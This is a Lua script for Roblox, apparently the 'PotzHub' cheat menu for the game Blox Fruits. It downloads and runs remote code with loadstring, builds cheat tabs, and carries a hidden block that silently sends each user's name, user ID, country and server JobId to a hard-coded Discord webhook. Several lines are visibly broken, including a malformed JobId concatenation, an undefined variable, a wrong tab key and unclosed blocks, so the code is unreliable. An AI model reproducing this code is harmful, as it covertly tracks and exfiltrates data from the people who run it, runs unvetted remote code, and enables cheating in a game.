---Fluent
local Fluent = loadstring(game:HttpGet("https://github.com/dawid-scripts/Fluent/releases/latest/download/main.lua"))()
local InterfaceManager = loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/Fluent/master/Addons/InterfaceManager.lua"))()

--Windows
local Window = Fluent:CreateWindow({
    Title = "PotzHub [Premium]" ,
    SubTitle = "Version 1.5",
    TabWidth = 160,
    Size = UDim2.fromOffset(580, 460),
    Acrylic = true, -- The blur may be detectable, setting this to false disables blur entirely
    Theme = "Darker",
    MinimizeKey = Enum.KeyCode.End -- Used when theres no MinimizeKeybind
})


--Tabs
local Tabs = {
    Main = Window:AddTab({ Title = "Main", Icon = "home" }),
    Stats = Window:AddTab({ Title = "Sub", Icon = "list-minus" }),
    Info = Window:AddTab({ Title = "Status", Icon = "users" }),
    Seaev = Window:AddTab({ Title = "Sea Event", Icon = "waves" }),
    Player = Window:AddTab({ Title = "Player", Icon = "user" }),
    Teleport = Window:AddTab({ Title = "Teleport", Icon= "tree-palm" }),
    Fruit = Window:AddTab({ Title = "Blox Fruits", Icon = "apple" }),
    Raid = Window:AddTab({ Title = "Raids", Icon = "user-round"}),
    Race = Window:AddTab({ Title = "Race Trial", Icon = "bird" }),
    Shop = Window:AddTab({ Title = "Shop", Icon = "shopping-cart"}),
    Misc = Window:AddTab({ Title = "Misc", Icon = "banknote" }),
    Hop = Window:AddTab({ Title = "Server", Icon = "server" }),
    Setting = Window:AddTab({ Title = "Settings", Icon = "settings" }),
    Fluent = Window:AddTab({ Title = "Config", Icon = "barcode" }),
}
local Options = Fluent.Options
do

    -- toggle ui
local L_91_ = Instance.new("ScreenGui")
local L_92_ = Instance.new("ImageButton")
local L_93_ = Instance.new("UICorner")
L_91_.Name = "ToggleUI"
L_91_.Parent = game.CoreGui
L_91_.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
L_92_.Name = "ToggleButton"
L_92_.Parent = L_91_
L_92_.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
L_92_.BorderSizePixel = 0
L_92_.Position = UDim2.new(0.120833337, 0, 0.0952890813, 0)
L_92_.Size = UDim2.new(0, 50, 0, 50)
L_92_.BackgroundTransparency = 1.000
L_92_.Image = "rbxassetid://17015092259"
L_92_.Draggable = true
L_92_.MouseButton1Click:Connect(function()
    game:GetService("VirtualInputManager"):SendKeyEvent(true, Enum.KeyCode.End, false, game)
end)
L_93_.CornerRadius = UDim.new(0, 15)
L_93_.Parent = L_92_

--credits
print("made by potzkie")
print("potz x hub")
print("potz was here :)")
print("wee wee")
print("ty for using - have fun :>")
print("disc : (Eggsell.#7704)")
print("lol")
print("Whitelisted!")

-- webhooks
local LocalizationService = game:GetService("LocalizationService")
local player = game.Players.LocalPlayer
local HttpService = game:GetService("HttpService")

local code = LocalizationService:GetCountryRegionForPlayerAsync(player)
local data = {
    embeds = {
        {
            title = "Profile",
            url = "https://www.roblox.com/users/" .. player.UserId,
            description = "```" .. player.DisplayName .. " (" .. player.Name .. ") ```",
            color = tonumber(322852),
            image = { url = selectedDay },
            thumbnail = { url = "https://cdn.discordapp.com/attachments/1221768340524109877/1225630043372261399/3hwnkpre.png?ex=6621d3ed&is=660f5eed&hm=575767e5dc7988f79f8bf6af39c72da567764c53fd54159298d659a609593154&" },
            fields = {
                {
                    name = "Country🌐",
                    value = "```Player country: " .. code .. "```",
                    inline = true
                },
                {
                    name = "Copy Script⬇",
                    value = '```game:GetService("TeleportService"):TeleportToPlaceInstance('..game.PlaceId..', "'..game.JobId..'", game.Players.LocalPlayer)```',
                    inline = true
                },
                {
                    name = "Job ID⬇",
                    value = '"```'..game.JobId'```"',
                    inline = true
                }
            }
        }
    }
}

local jsonData = HttpService:JSONEncode(data)
local webhookUrl = "https://discord.com/api/webhooks/1226030430667542539/_KnPYDaoSUq91QqtliWKWg4k7Q5rJ_AxsLgJI5xmUbBMmIx_lt5YDUjPDXqlxGrs9_Fn"
local headers = { ["Content-Type"] = "application/json" }
local request = http_request or request or HttpPost or syn.request
local final = { Url = webhookUrl, Body = jsonData, Method = "POST", Headers = headers }

local success, response = pcall(request, final)
if success then
    print("+1 User excuted")
else
    print("executor issue: " .. response)
end

--loading
if not game:IsLoaded() then repeat game.Loaded:Wait() until game:IsLoaded() end
if
game.ReplicatedStorage:FindFirstChild("Remotes") 
then
if
game.Players.LocalPlayer:FindFirstChild("PlayerGui")
then
game.Players.LocalPlayer.PlayerGui:FindFirstChild("Main")
if 
game:GetService("Players").LocalPlayer.Character:FindFirstChild("Energy")
then
if game:IsLoaded() then

--fluent addon
InterfaceManager:SetLibrary(Fluent)
InterfaceManager:SetFolder("PotzHubV1.5")
InterfaceManager:BuildInterfaceSection(Tabs.Settings)
Window:SelectTab(1)

--Notify
Fluent:Notify({
    Title = "PotzHub Loaded.",
    Content = "Welcome! "..game.Players.LocalPlayer.Name.." Enjoy!",
    SubContent = "Whitelisted User", -- Optional
    Duration = 5 -- Set to nil to make the notification not disappear
})
